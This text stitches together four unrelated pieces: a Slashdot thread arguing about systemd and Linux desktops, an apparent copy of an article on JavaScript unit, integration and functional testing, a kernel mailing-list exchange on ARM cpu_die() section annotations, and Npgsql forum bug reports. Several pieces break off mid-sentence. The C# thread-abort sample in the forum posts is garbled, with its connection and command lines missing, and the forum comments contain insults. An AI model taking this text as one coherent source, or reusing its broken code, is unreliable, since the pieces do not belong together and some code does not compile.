First, about systemd. Exactly what "problems" has it caused the users? On a normal distro, it runs in the background and should be transparent. sysvinit was ancient, and not even Solaris (the last true UNIX) uses it, it switched to SMF ages ago. All the anti-systemd hysteria I've seen has only been about vague possibilities, or whining about "the one true UNIX philosophy" (which again, apparently real UNIX doesn't even follow), etc. Whereas the systemd supporters can actually point to real, tangible benefits. Now admittedly, at home I'm a longtime user of Linux Mint which still runs on upstart for the moment, but I've been using CentOS 7 machines at work and I haven't run into any problems there (except for fucking Gnome3, more on that later). systemd seems to me to work just fine.
However, with Gnome3 and Unity, you're exactly right. The two most powerful and influential distros (Fedora/RHEL and Ubuntu) both changed to awful DEs, which certainly can't be attractive to new users who aren't looking for something that's a complete sea-change from the UIs they're used to. By all rights, KDE should be the default DE: it's reasonably fast, it's pretty bug-free at this point (compared to Gnome3, which is full of bugs in my personal experience with CentOS7), it's full-featured, it's highly configurable to do whatever you want, whether you want it to be more like Windows or like MacOS, and it's a familiar paradigm. Yes, the "semantic desktop" stuff is useless, but it's actually turned off by default on many distros now I believe, and if not, it's easy to disable and simply ignore--I do. So why Linux distros are pushing minimalistic DEs, I dunno. But I'm certainly not the only one who doesn't like them: there's a reason Mint has become so popular, and so many people have switched to Cinnamon and MATE.
Honestly, the big misstep that started most of this crap was the founding of GNOME back in the late 90s, due to the licensing issue with Qt. They should have abandoned Gnome when Qt finally was released under the GPL, then we wouldn't have these issues now.
Re: (Score:2)
Let me re-write that:
"KDE should be the default DE for everyone because I like it more"
and
"Software should have never been created, because having more choice in FOSS software is somehow bad for the Linux ecosystem."
Can you find the logic?
Re: (Score:3, Interesting)
"KDE should be the default DE for everyone because I like it more"
No, it should be the default because it's highly configurable. Any distro can easily make a preferred configuration instead of making an all-new DE. Obviously, a lot of people hated Gnome3, which is exactly why both MATE and Cinnamon were created. I think it would have been easier if they had put that effort into re-skinning KDE.
"Software should have never been created, because having more choice in FOSS software is somehow bad for the Lin
Re: (Score:2)
no good reason, as KDE has good defaults.
Re: (Score:2)
That's why you're an idiot: the defaults are fine, and there's nothing forcing you to configure it differently.
Re: (Score:2)
How will the defaults being what you want stop people playing with them?
The defaults aren't what I want; they're whatever the distro decides on (which are likely not very different from what the KDE publishes).
There's nothing stopping people from playing with them. How is that a bad thing? Holy shit, is everyone on Slashdot a Mac fan now? That probably isn't even fair to say, since even Macs have some configurability.
Re: (Score:2)
This is stupid.
First, KDE is not really competing against low-resource desktops like LXDE and XFCE.
Second, configurability is not a detriment. If you don't want to change the configuration, then DON'T. Leave it at the defaults. No one is forcing you to go through every configuration option.
My car has a bunch of configuration options in the infotainment system. I can change all kinds of things: audio settings, HUD settings, navigation settings, etc. This doesn't make it hard to drive, because most peopl
Re: (Score:3).
It has also made ancient aliens take over Congress, caused otherwise normal people to massacre entire cities, and caused cancer in everyone. Finally, tiny little boils that explode and throw white-hot magma on everyone in cows. systemd is the real cause of all those millions of acres of wildfires in Washington state.
Now tell me. It is apparent that you hate systemd with a white-hot passion.
So why are you using it? You do not have to use it, and if you aren't, what on earth are you bitching about? I mean r
Re:The Linux community is destroying itself. (Score:4, Insightful)
An appeal to ridicule is a logical fallacy: if it were an entertaining appeal to ridicule, it might be amusing, and I wouldn't expect pure logic on Slashdot. But please note that it doesn't address or even acknowledge a single one of the issues I mentioned. Many of those issues are architectural and core to systemd development.
And no, I don't "hate systemd with a white hot passion". It does a few things reasonably well, and there are some real benefits to getting faster boot times and kernel logging. The network integration is problematic, but shows some promise.
But systemd really needs to _stop_ trying to replace core system functions with yet another add-on module. And yes, it's trying to take on software packaging, as well.
Re: (Score:2)
An appeal to ridicule is a logical fallacy:
You assume I'm arguing with you. Use a distro with system d or do not.
However, just as annoyed as you get with my little bit of ridicule, imagine how annoying it is to not hear the word "Linux" without someone bitching about systemd.
If it is the unmitigated disaster some folks say it is, the problem will fix itself in short order.
Re: (Score:2)
And yes, it's trying to take on software packaging, as well.
FreeBSD user (and Mac OSX) here, so I've only followed the systemd meltdown from the periphery. Is that really true about systemd and packaging?
Re: (Score:2)
Apparently so. See... [0pointer.net] .
Re: (Score:2)
KDE doesn't depend on systemd. KDE runs on FreeBSD, which doesn't have systemd. KDE also runs on Windows.
Re: (Score:2)
> But udev doesn't depend on systemd, so your slippery slope is not very slippery.
It only has to be a little slippery, it's the steepness that lets people fall in. See the kdbus and similar components for the ongoing integration of udev with systemd.
Re: (Score:2).
None of that is really true. If you want syslog, just install syslog, and uninstall journald, systemd is modular, and you can pick and choose, you can even run syslog AND journald.
Similarly, the su ability is a new method you don't need to use. It is only a special case of a new shell with a changed user that maintains all the most recent freedesktop variables.
Re: (Score:2)
> systemd's policy to drop them makes servers less secure
They have _replaced_, systlog with kernel resident binary logging utilities. This has advantages: you can generate monitoring from the kernel, itself, at boot time, before syslogd is running.
The big concern I've encountered is that systemd replaced stable, legible, parseable, well understood log output with a published but quite unique log format which no other tools in the world knew how to read. It wasn't necessary for enhancing init script mana
Re: The Linux community is destroying itself. (Score:2)
Please provide a link to a systemd document explaining their "policy to drop syslog messages".
On RH/Centos, systemd forwards to syslog by default, but systemctl status dhcpd (or similar) is very handy.
Re: (Score:3)
I call FUD.
Apparently systemd only consumes log messages by default. If you're looking for forensic analysis or troubleshooting, you can turn on forwarding to a normal syslog service like rsyslog or syslog-ng.
Re: (Score:2)
Examples of systemd breaking the kernel include the "debug" logging option, and the inevitable failures of such a complex weave of components killing PID 1.... [freedesktop.org] [ewontfix.com]
Unfortunately, "running syslogd in parallel" doesn't work well as new daemons or services are compiled for one or the other. And I'm afraid the code to integrate with systemd logging is a tar-baby: it
Re: (Score:2)
Well it is the community that just took the easy path and created a dependency on them.
Not really. Linux distros have long been divided into to major factions, the Red Hat faction and the Debian faction, plus some other sizeable mostly-unaligned groups (Slackware, Arch, Gentoo). These three factions still can't agree on even a package manager for some strange reason, even though it'd make things a lot easier to have this standardized. Debian is in no way dependent on RH. Ubuntu is dependent on Debian h
Re: (Score:2)
What distro features KDE5? I'm not aware of any.
If you're trying out alpha software, then I don't think it's at all fair to complain about issues like this. You can't expect a good out-of-the-box experience with something that isn't ready for prime-time.
All the KDE distros I know of are still using KDE4. Remember, they had this problem before: a bunch of distros switched to KDE4.0 way too soon (there's disagreement over whether the KDE team claimed it was ready for use or still in beta), and it was a dis
Re: (Score:2).
Go here: [distrowatch.com]
Then come back and blame this silly fake disaster on systemd.
Re: (Score:2)
I think you did not understand his point.
Re: (Score:2)
I think you did not understand his point.
What's "the Linux community" if not roll your own if you don't like it?
Division is exactly what Linux is all about. If you don't like something, fork it. If the folks who start going apeshit the second systemd is mentioned were to fork it, instead of the incessant whining, they wouldn't have anything to do other than brag about how superior their computing experience is, and eventually the distros with systemd would become mere footnotes, as its ruinous qualities will just cause it to fail.
Right?
Re: (Score:2)
still off topic
Re: (Score:3)
My theory
We saw this in Windows in 2006.
Vista scarred users so much they freaking stuck with a 12-year-old OS after Windows 7 cleansed all the messes of Vista. Some were happy to get Windows 7 and it had measurable marketshare from sites back on the RC days lol. The other half
... XP WORKS FINE!! CHANGE FOR THE SAKE OF CHANGE NA NA.. etc.
Well, systemd tried to do what init failed to do on a modern system. Event-driven MacBooks with launchd could sleep in one time zone and wake in another.
:-) Init can't d
Re:The Linux community is destroying itself. (Score:5, Insightful)
You, and people like you, exhibit the mentality and attitude that is responsible for the ongoing destruction of Linux.
Long time Linux users who use Linux for critical systems repeatedly describe the problems they've encountered with certain pieces of software, such as systemd and GNOME 3. Instead of listening to these users and trying to understand their problems, you and your ilk deny that these serious problems exist, and then attack these users for daring to mention these problems (by wrongly accusing them of "trolling", for example)..
We only need to look to Mozilla and Firefox to see what happens when users are treated like dirt. Firefox was once a very popular web browser, with well over 30% of the browser market. But then the Firefox developers stopped listening to what Firefox users wanted, and instead forced unwanted junk on Firefox's users. Even worse, the Firefox developers did not listen to the objections of Firefox's users to these unwanted changes. After several years of treating Firefox's users so poorly, we can see the awful results. Firefox is now under 10% of the market. The users who propelled Firefox to success have moved on to greener pastures, which even include modern versions of IE, as unbelievable as that may be. Now Firefox is seen as a joke browser, rather than the powerhouse that it once was, just a few years ago.
I sure hope that what we've seen happen to Firefox doesn't happen to Linux, but things aren't looking encouraging. There are just too many people like you, who are incapable of seeing the big picture, and more important, incapable of listening to the users of Linux. Not listening to these users and their concerns is perhaps the most harmful thing that can happen to Linux as a whole.
Re: (Score:2)
We only need to look to Mozilla and Firefox to see what happens when users are treated like dirt. Firefox was once a very popular web browser, with well over 30% of the browser market.
The problem with using that as an example is that Linux doesn't have 30% of the desktop PC market, it barely has more than 1%.
It never was popular to begin with.
Re:The Linux community is destroying itself. (Score:5, Insightful)
Long time Linux users who use Linux for critical systems...
Oh hey, that's me.
...repeatedly describe the problems they've encountered with certain pieces of software, such as systemd and GNOME 3.
Well, yeah. I'm a cranky old fart.
Instead of listening to these users and trying to understand their problems, you and your ilk deny that these serious problems exist...
Now wait just one Turing-completing minute there!
The problems aren't serious. They don't break my critical systems, because I'm not going to be deploying systemd into production until I've tested it thoroughly. My old init scripts will get a wrapper or a rewrite to fit the new OS as needed, but the software interface won't change very much at all. Now, if you want a serious problem, find a vulnerability in a basic system utility, like bash or OpenSSH. Those problems are already out in the wild, deployed to production systems. When a new one of those problems is found, there's a notable increase in the use of profanity around my desk.
A new startup system, or a new package format, or a new thing that does this thing different than how the old thing did that thing... none of those bother me. I'll wait, running my old-but-stable critical systems, until you short-tempered folks settle on exactly what you want to do. I'll then work around whatever issues remain, because that's my job. I'm a sysadmin.
Re: (Score:2)
No. It gives you license to want to murder the previous sysadmin who didn't bother to learn the system he was using.
On the other hand, if it's only "poorly-configured" because it doesn't conform to your standards, but does fit the design Ubuntu intends, then you have nobody to blame but yourself.
Re: (Score:3)
So how is that different from when the init script goes and fubars itself, or shits all over a log and you can't fix it? Or what about the kernel itself? What if your CPU is really a small explosive device, planted to sabotage your mission-critical systems? I guess you should go fire everyone who ever puts anything into mission-critical systems, because they might fail sometime.
I am not suggesting that critical failure is acceptable, but I do argue that the expertise, testing, and trust of a new system sho
Re: (Score:2).
You can really see this in Ubuntu and the Ubuntu Forums. Back a long time ago...
:) There were many active Ubuntu LoCos and knowledgeable people on Ubuntu Forums. Then the LoCo requirements got weird, and regions got arbitrarily changed. (Like Texas being one region since it was one state... Forget the fact that Dallas is closer to Chicago than El Paso.) And the LoCo community started to fall apart. Then Ubuntu Forums got hacked, and they went to the Ubuntu universal account that would not keep you lo
Re: (Score:2)
Re: (Score:2)
P.S. I assume you meant "tail | grep" not "grep | tail" !
"grep | tail" works better IMO
Re: (Score:3)
You have got to understand one thing : Linux is the playground of Red Hat. From top to bottom Red Hat does and the others follow or die. The idea that there is freedom in the open source movement is pure illusion. He who has control of the infrastructure components has control of linux. The other guys are just small fish. Even Ubuntu doesn't go anywhere without Debian, and Debian doesn't go anywhere without Red Hat.
Ironic that you post this in an article that is in no way about rpm...
:) I think it is more about developers that have become user unfocused. The "We know what they want more than they do" mentality. That never works well.
Re: (Score:3)
I think it is more about developers that have become user unfocused. The "We know what they want more than they do" mentality. That never works well.
It works quite well *if* you have a very good designer/innovator. Steve Jobs was arguably the best ever at building a product people didn't know they wanted until they saw his version of it.
The problem is that very few people are good at design, and most are really, really bad. When that happens we have to wait until market forces play out and the design fails.
Re: (Score:2, Troll)
You're why we don't have flying cars yet.
Oh don't be so dramatic. The real reason Linux is holding up flying cars is shitty drivers.
Re: (Score:2)
You're why we don't have flying cars yet.
Oh don't be so dramatic. The real reason Linux is holding up flying cars is shitty drivers.
If they would just share the API so we didn't need a flying car binary blob...
Re: (Score:2)
This whole systemd fiasco has caused a boatload of infighting, dissension among what should be cooperative members and teams, and it makes the process of administering Linux systems that much harder.
There is no need for a Microsoft conspirator to produce this outcome. The linux community, filled by zealots who *believe* in "Right Things" is completely responsible for its fate. Any change to core components will result in a mess.
Extremely good changes will cause little problems (only some whining) ; reasonably good changes with little drawbacks will cause havoc. And instead of working together with authors to improve shortcomings, they will just waste their time (as well as the time of the authors) to
Re:My theory (Score:5, Interesting)
Can someone explain to me why an article on a serious change in Ubuntu that has zilch to do with systemd has been hijacked by the systemdaphobes?
Unlike systemd, this change actually appears to have significant negative repercussions, not "I'm not actually an old system admin but I pretend to be on Slashdot because I hated pulseaudio and by god I'm not going to let the author of that replace a crusty, unreliable, set of shell scripts and get away with it" type "trying to find excuses to bash it" type stuff, as we see with systemd, but real concerns about cross-distro compatibility, and change-for-change's sake.
So it'd be nice to have a discussion about it.
These seems to be a theme on Slashdot lately. People want to hijack barely related threads to discuss something that makes them hot under the collar. And, perhaps not surprisingly given the mentality needed to hijack unrelated discussions, it seems that the views they express are generally trollish and slimy.
Can you let us discuss Snappy? Please? It sounds like it has serious ramifications to me. Tell you what, if you STFU, I won't troll - and encourage other Ubuntu users to troll - the next systemd article. Deal?
Re: (Score:2)
Microsoft didn't shy away from destroying the then-largest mobile phone vendor, Nokia.
Nokia destroyed itself by trucking on with crusty Symbian for too long. The Microsoft deal happened a long time after that.
JavaScript Testing: Unit vs Functional vs Integration Tests

By Eric Elliott
Here are some simple unit test examples from real projects using Tape:
```javascript
// Ensure that the initial state of the "hello" reducer gets set correctly
import test from 'tape';
import hello from 'store/reducers/hello';

test('...initial', assert => {
  const message = `should set { mode: 'display', subject: 'World' }`;

  const expected = {
    mode: 'display',
    subject: 'World'
  };

  const actual = hello();

  assert.deepEqual(actual, expected, message);
  assert.end();
});
```
```javascript
// Asynchronous test to ensure that a password hash is created as expected.
import test from 'tape';
import credential from '../credential';

test('hash', function (t) {
  // Create a password record
  const pw = credential();

  // Asynchronously create the password hash
  pw.hash('foo', function (err, hash) {
    t.error(err, 'should not throw an error');
    t.ok(JSON.parse(hash).hash,
      'should be a json string representing the hash.');
    t.end();
  });
});
```
Integration Tests
Integration tests ensure that various units work together correctly. For example, a Node route handler might take a logger as a dependency. An integration test might hit that route and test that the connection was properly logged.
In this case, we have two units under test:
- The route handler
- The logger
If we were unit testing the logger, our tests wouldn’t invoke the route handler, or know anything about it.
If we were unit testing the route handler, our tests would stub the logger, and ignore the interactions with it, testing only whether or not the route responded appropriately to the faked request.
Let’s look at this in more depth. The route handler is produced by a factory function, which uses dependency injection to inject the logger into the route handler. Let’s look at the signature (see the rtype docs for help reading signatures):
createRoute({ logger: LoggerInstance }) => RouteHandler
Let’s see how we can test this:
import test from 'tape';
import createLog from 'shared/logger';
import createRoute from 'routes/my-route';

test('logger/route integration', assert => {
  const msg = 'Logger logs router calls to memory';

  const logMsg = 'hello';
  const url = `${ logMsg }`;

  const logger = createLog({ output: 'memory' });
  const routeHandler = createRoute({ logger });

  routeHandler({ url });

  const actual = logger.memoryLog[0];
  const expected = logMsg;

  assert.equal(actual, expected, msg);
  assert.end();
});
We’ll walk through the important bits in more detail. First, we create the logger and tell it to log in memory:
const logger = createLog({ output: 'memory' });
Create the router and pass in the logger dependency. This is how the router accesses the logger API. Note that in your unit tests, you can stub the logger and test the route in isolation:
const routeHandler = createRoute({ logger });
Call the route handler with a fake request object to test the logging:
routeHandler({ url });
The logger should respond by adding the message to the in-memory log. All we need to do now is check to see if the message is there:
const actual = logger.memoryLog[0];
Similarly, for APIs that write to a database, you can connect to the database and check to see if the data is updated correctly, etc…
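The article doesn't show the two factories themselves. A minimal sketch of what they might look like, assuming a simple info()/memoryLog logger API (both names are hypothetical; all the test relies on is that memory mode records messages in memoryLog):

```javascript
// Hypothetical sketches of the two collaborating units under test.

// createLog returns a logger; with { output: 'memory' } it records
// messages in an in-memory array instead of writing to stdout, so
// tests can inspect exactly what was logged.
const createLog = ({ output = 'stdout' } = {}) => {
  const memoryLog = [];
  return {
    memoryLog,
    info (msg) {
      if (output === 'memory') {
        memoryLog.push(msg);
      } else {
        console.log(msg);
      }
    }
  };
};

// createRoute takes the logger as an injected dependency and returns
// a route handler which logs the requested url.
const createRoute = ({ logger }) => ({ url }) => {
  logger.info(url);
  // ...handle the request here...
};
```

Because the logger is injected rather than imported directly, a unit test of the route handler can pass in a stub, while the integration test above passes in the real in-memory logger and asserts on the collaboration.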
Many integration tests test interactions with services, such as 3rd party APIs, and may need to hit the network in order to work. For this reason, integration tests should always be kept separate from unit tests, in order to keep the unit tests running as quickly as they can.
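One simple way to enforce that separation is to give each suite its own directory and npm script, so the fast unit suite can run on every save while the network-bound integration suite runs less often. A hypothetical package.json fragment (paths and script names are assumptions):

```json
{
  "scripts": {
    "test:unit": "tape test/unit/**/*.js",
    "test:integration": "tape test/integration/**/*.js",
    "test": "npm run test:unit",
    "test:all": "npm run test:unit && npm run test:integration"
  }
}
```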
Functional Tests
Functional tests are automated tests which ensure that your application does what it’s supposed to do from the point of view of the user. Functional tests feed input to the user interface, and make assertions about the output that ensure that the software responds the way it should.
Functional tests are sometimes called end-to-end tests because they test the entire application, and its hardware and networking infrastructure, from the front end UI to the back end database systems. In that sense, functional tests are also a form of integration testing, ensuring that machines and component collaborations are working as expected.
Functional tests typically have thorough tests for “happy paths” — ensuring that the critical app capabilities, such as user logins, signups, purchase workflows, and all the other critical user workflows, behave as expected.
Functional tests should be able to run in the cloud on services such as Sauce Labs, which typically use the WebDriver API via projects like Selenium.
That takes a bit of juggling. Luckily, there are some great open source projects that make it fairly easy.
My favorite is Nightwatch.js. Here's what a simple Nightwatch functional test suite looks like, using this example from the Nightwatch docs:
module.exports = {
  'Demo test Google' : function (browser) {
    browser
      .url('http://www.google.com')
      .waitForElementVisible('body', 1000)
      .setValue('input[type=text]', 'nightwatch')
      .waitForElementVisible('button[name=btnG]', 1000)
      .click('button[name=btnG]')
      .pause(1000)
      .assert.containsText('#main', 'Night Watch')
      .end();
  }
};
As you can see, functional tests hit real URLs, both in staging environments, and in production. They work by simulating actions the end user might take in order to accomplish their goals in your app. They can click buttons, input text, wait for things to happen on the page, and make assertions by looking at the actual UI output.
Smoke Tests
After you deploy a new release to production, it’s important to find out right away whether or not it’s working as expected in the production environment. You don’t want your users to find the bugs before you do — it could chase them away!
It’s important to maintain a suite of automated functional tests that act like smoke tests for your newly deployed releases. Test all the critical functionality in your app: The stuff that most users will encounter in a typical session.
Smoke tests are not the only use for functional tests, but in my opinion, they’re the most valuable.
What Is Continuous Delivery?
Prior to the continuous delivery revolution, software was released using a waterfall process. Software would go through the following steps, one at a time. Each step had to be completed before moving on to the next:
- Requirement gathering
- Design
- Implementation
- Verification
- Deployment
- Maintenance
It’s called waterfall because if you chart it with time running from left to right, it looks like a waterfall cascading from one task to the next. In other words, in theory, you can’t really do these things concurrently.
In theory. In reality, a lot of project scope is discovered as the project is being developed, and scope creep often leads to disastrous project delays and rework. Inevitably, the business team will also want “simple changes” made after delivery without going through the whole expensive, time-consuming waterfall process again, which frequently results in an endless cycle of change management meetings and production hot fixes.
A clean waterfall process is probably a myth. I’ve had a long career and consulted with hundreds of companies, and I’ve never seen the theoretical waterfall work the way it’s supposed to in real life. Typical waterfall release cycles can take months or years.
The Continuous Delivery Solution
Continuous delivery is a development methodology that acknowledges that scope is uncovered as the project progresses, and encourages incremental improvements to software in short cycles that ensure that software can be released at any time without causing problems.
With continuous delivery, changes can ship safely in a matter of hours.
In contrast to the waterfall method, I’ve seen the continuous delivery process running smoothly at dozens of organizations — but I’ve never seen it work anywhere without a quality array of test suites that includes both unit tests and functional tests, and frequently includes integration tests, as well.
Hopefully now you have everything you need to get started on your continuous delivery foundations.
Conclusion
As you can see, each type of test has an important part to play. Unit tests for fast developer feedback, integration tests to cover all the corner cases of component integrations, and functional tests to make sure everything works right for the end users.
How do you use automated tests in your code, and how does it impact your confidence and productivity? Let me know in the comments.
On Sun, Sep 27, 2009 at 07:39:04PM +0100, Russell King - ARM Linux wrote:
> On Sun, Sep 27, 2009 at 08:27:07PM +0200, Sam Ravnborg wrote:
> > On Sun, Sep 27, 2009 at 05:41:16PM +0100, Russell King - ARM Linux wrote:
> > > Sam,
> > >
> > > Any idea how to solve this:
> > >
> > > WARNING: arch/arm/kernel/built-in.o(.text+0x1ebc): Section mismatch in reference from the function cpu_idle() to the function .cpuexit.text:cpu_die()
> > > The function cpu_idle() references a function in an exit section.
> > > Often the function cpu_die() has valid usage outside the exit section
> > > and the fix is to remove the __cpuexit annotation of cpu_die.
> > >
> > > WARNING: arch/arm/kernel/built-in.o(.cpuexit.text+0x3c): Section mismatch in reference from the function cpu_die() to the function .cpuinit.text:secondary_start_kernel()
> > > The function __cpuexit cpu_die() references
> > > a function __cpuinit secondary_start_kernel().
> > > This is often seen when error handling in the exit function
> > > uses functionality in the init path.
> > > The fix is often to remove the __cpuinit annotation of
> > > secondary_start_kernel() so it may be used outside an init section.
> > >
> > > Logically, the annotations are correct - in the first case, cpu_die()
> > > will only ever be called if hotplug CPU is enabled, since you can't
> > > offline a CPU without hotplug CPU enabled.  In that case, the __cpuexit.*
> > > sections are not discarded.
> >
> > The annotation of cpu_die() is wrong.
> > To be annotated __cpuexit the function shall:
> > - be used in exit context and only in exit context with HOTPLUG_CPU=n
> > - be used outside exit context with HOTPLUG_CPU=y
> >
> > cpu_die() fails on the first condition because it is only used
> > if HOTPLUG_CPU=y.
> > The annotation is wrongly used as a replacement for an ifdef.
> > As cpu_die() is already inside ifdef CONFIG_HOTPLUG_CPU it should
> > be enough to just remove the annotation.
> >
> > Like this (copy'n'paste so it does not apply)
> >
> > diff --git a/arch/arm/kernel/smp.c b/arch/arm/kernel/smp.c
> > index e0d3277..de4ef1c 100644
> > --- a/arch/arm/kernel/smp.c
> > +++ b/arch/arm/kernel/smp.c
> > @@ -214,7 +214,7 @@ void __cpuexit __cpu_die(unsigned int cpu)
> >   * of the other hotplug-cpu capable cores, so presumably coming
> >   * out of idle fixes this.
> >   */
> > -void __cpuexit cpu_die(void)
> > +void cpu_die(void)
> >  {
> >  	unsigned int cpu = smp_processor_id();
>
> This is wrong. cpu_die() does not need to exist if hotplug CPU is
> disabled. In that case, it should be discarded and this is precisely
> what __cpuexit does. The annotation is, therefore, correct.

From arch/arm/kernel/smp.c

#ifdef CONFIG_HOTPLUG_CPU
...
void __cpuexit cpu_die(void)
{
	unsigned int cpu = smp_processor_id();

	local_irq_disable();
	idle_task_exit();

	/*
	 * actual CPU shutdown procedure is at least platform (if not
	 * CPU) specific
	 */
	platform_cpu_die(cpu);

	/*
	 * Do not return to the idle loop - jump back to the secondary
	 * cpu initialisation. There's some initialisation which needs
	 * to be repeated to undo the effects of taking the CPU offline.
	 */
	__asm__("mov	sp, %0\n"
	"	b	secondary_start_kernel"
		:
		: "r" (task_stack_page(current) + THREAD_SIZE - 8));
}
#endif /* CONFIG_HOTPLUG_CPU */

Please look at the above and realise that cpu_die() is only ever defined
in case that HOTPLUG_CPU is defined.  So there is nothing to discard if
HOTPLUG_CPU equals to n.

And just to repeat myself....

The only correct use of __cpu* annotation is for function/data that is
used with or without HOTPLUG_CPU equals to y.
Which is NOT the case for cpu_die().

The __cpu* annotation is not a replacement for ifdeffed out code that is
not relevant for the non-HOTPLUG_CPU case.

	Sam
SSL, DataTables, and bytea transfers
[ reply ]
By:
Dan Sherwin
on 2008-01-15 02:38
[forum:1003022]
I'm utilizing Npgsql 1.0.0, and I have a simple table with 3 columns: 2 text fields and one bytea. When I insert a row into my DataTable with a bytea field size of, say, 35K, using an SSL connection, and I call the DataAdapter.Update method on the DataTable, the new row does not get added to the table. Log output shows no errors and nothing out of the ordinary, and the Postgres log doesn't even seem to see the insert statement. If I perform the exact same procedure without an SSL connection, everything works fine. If I just have a couple of bytes in the bytea field, using SSL, everything also works fine. Oh, and NpgsqlCommand.Prepare has no effect one way or the other. I am using Postgres 8.1.4 on a FreeBSD machine. Any ideas? I will post some sample code if needed; I figured my explanation may be enough for someone to recognize it.
Thanks in advance.
RE: SSL, DataTables, and bytea transfers
[ reply ]
By:
Francisco Figueiredo jr.
on 2008-01-15 20:23
[forum:1003024]
We had a lot of problems with transfers getting stuck with SSL enabled. Can you get a newer Mono.Security.dll assembly from the Mono project and give it a try?
You can get newer assemblies from
You must get Mono.Security.dll assemblies for .net 1.1
I hope it helps.
Specified Method Not Supported?
[ reply ]
By:
Joe Bagodonuts
on 2008-01-10 20:22
[forum:1003008]
Hey, people -
I'm using the 2.0 Beta version of npgsql in a C#.Net app. I'm able to load the reference and see it in the Object Browser (even though I was unable to add it to the GAC -- "Failure adding assembly to the cache: Unknown Error" -- but that's another thread). I successfully connect to my test database, but when I try to list the tables using NpgsqlConnection.getSchema(collection) I get the Method Not Supported exception. getSchema() works fine with NO args, but I'm not getting what I want from that. Has anyone seen this and, if so, can you tell me a way to get past it? My thanks in advance...
Broken Connections
[ reply ]
By:
Andreas Schönebeck
on 2008-01-09 10:38
[forum:1002997]
Hello from Berlin!
I'm running into trouble calling Thread.Abort() on a thread that is doing an NpgsqlCommand.ExecuteReader(). The command and connection are created in the thread itself. Also, there is only one connection open at a time, because the main thread waits for completion using Thread.Join().
To illustrate the problem I've written a test to create 10 threads, which are aborted after a short random time (100-1000 ms) and a final thread, which is never aborted and should run cleanly to the end.
As you can see by the test's output there are various exceptions generated by the aborted threads and only sometimes the ThreadAbortException gets cleanly caught.
Weirdest of all, after the 10th aborted thread catches a clean ThreadAbortException ("[9] Thread aborted."), the final thread, which should run to the end and read ~50000 records, throws an exception in ExecuteReader()!?!
In application context (user pressing "refresh" very quickly, high server load) the last database read will sometimes not return any results.
What can I do to improve stability? I hope, the test case code is giving an idea of my problem and someone has a quick and proper fix.
Maybe I found a bug in Npgsql: ThreadAbortExceptions are not handled properly, and connections end up in a corrupted state but are reused by the pool?
Thanks for looking into this,
Andreas Schönebeck
// Output
[Main] Starting Thread [0].
[Main] Aborting Thread [0].
[Main] Waiting for Thread [0] to finish.
[0] Unhandled exception caught (System.NotSupportedException): Dieser Stream unterstützt keine Suchvorgänge.
[Main] Starting Thread [1].
[Main] Aborting Thread [1].
[Main] Waiting for Thread [1] to finish.
[1] Unhandled exception caught (System.NotSupportedException): Backend sent unrecognized response type:
[Main] Starting Thread [2].
[Main] Aborting Thread [2].
[Main] Waiting for Thread [2] to finish.
[2] Unhandled exception caught (System.NotSupportedException): Backend sent unrecognized response type:
[Main] Starting Thread [3].
[Main] Aborting Thread [3].
[3] Unhandled exception caught (System.NotSupportedException): Dieser Stream unterstützt keine Suchvorgänge.
[Main] Waiting for Thread [3] to finish.
[Main] Starting Thread [4].
[Main] Aborting Thread [4].
[4] Unhandled exception caught (System.NotSupportedException): Dieser Stream unterstützt keine Suchvorgänge.
[Main] Waiting for Thread [4] to finish.
[Main] Starting Thread [5].
[Main] Aborting Thread [5].
[5] Unhandled exception caught (System.NotSupportedException): Dieser Stream unterstützt keine Suchvorgänge.
[Main] Waiting for Thread [5] to finish.
[Main] Starting Thread [6].
[Main] Aborting Thread [6].
[6] Unhandled exception caught (System.NotSupportedException): Dieser Stream unterstützt keine Suchvorgänge.
[Main] Waiting for Thread [6] to finish.
[Main] Starting Thread [7].
[Main] Aborting Thread [7].
[7] Unhandled exception caught (System.NotSupportedException): Dieser Stream unterstützt keine Suchvorgänge.
[Main] Waiting for Thread [7] to finish.
[Main] Starting Thread [8].
[Main] Aborting Thread [8].
[8] Unhandled exception caught (System.NotSupportedException): Dieser Stream unterstützt keine Suchvorgänge.
[Main] Waiting for Thread [8] to finish.
[Main] Starting Thread [9].
[Main] Aborting Thread [9].
[Main] Waiting for Thread [9] to finish.
[9] Thread aborted.
[Main] Starting Thread [10].
[10] Unhandled exception caught (System.NotSupportedException): Dieser Streamunterstützt keine Suchvorgänge.
[Main] Waiting for Thread [10] to finish.
Press any key to continue . . .
// Source...
using System;
using System.Threading;
using Npgsql;
class Program
{
public static void Main(string[] args)
{
RunTestAbort(0);
RunTestAbort(1);
RunTestAbort(2);
Console.Write("Press any key to continue . . . ");
Console.ReadKey(true);
}
public static void RunTestAbort(int id)
{
Thread dbthread = new Thread(AbortThreadFunc);
Console.WriteLine("[Main] Starting Thread [{0}].", id);
dbthread.Start(id);
Thread.Sleep(150);
Console.WriteLine("[Main] Aborting Thread [{0}].", id);
dbthread.Abort();
Console.WriteLine("[Main] Waiting for Thread [{0}] to finish.", id);
dbthread.Join();
}
public static void AbortThreadFunc(object parameter)
{
int id = (int)parameter;";
using(NpgsqlDataReader sdr = cmd.ExecuteReader()) {
int recordcount = 0;
while (sdr.Read()) {
recordcount++;
}
Console.WriteLine("[{0}] Successfully read {1} records.", id, recordcount);
}
}
}
} catch (ThreadAbortException ex) {
Console.WriteLine("[{0}] Thread aborted.", id, ex.StackTrace);
} catch (Exception ex) {
Console.WriteLine("[{0}] Unhandled exception caught ({1}): {2}", id, ex.GetType().ToString(), ex.Message);
}
}
}
Unplugging network causes null reference ex
[ reply ]
By:
Alex Simmens
on 2008-01-03 17:59
[forum:1002973]
Hi, I've been experimenting with the Npgsql 2.0 beta 2 driver and I noticed a possible bug.
I created 3 connections to a Postgres db with the same connection string. If I unplug my network cable and run an ExecuteReader command such as SELECT * FROM queues WHERE queueno = 1; on one of the connections, then after the command times out I get an unhandled null reference exception in the NpgsqlConnectorPool.TimerElapsed handler.
On investigation, I found it to be caused by the queue object on this line being null: (Queue.Count > 0)
I tried fixing it by adding an if (Queue != null) check before it, and it seems to work, but as I don't understand how Npgsql works and I don't know C# very well, I may be being silly.
hope it helps
alex
RE: Unplugging network causes null reference ex
[ reply ]
By:
Alex Simmens
on 2008-01-03 18:13
[forum:1002974]
Just to give some more info: I'm running my app in VS2005 on WinXP, and the Postgres server is on the local area network.
multiple threads with independent connections
[ reply ]
By:
Carl Strange
on 2008-01-02 16:47
[forum:1002966]
I'm starting work on a personal project to gather data from various web sites. I'm relatively comfortable in C# and with SQL but this will be my first use of Npgsql and PostgreSQL.
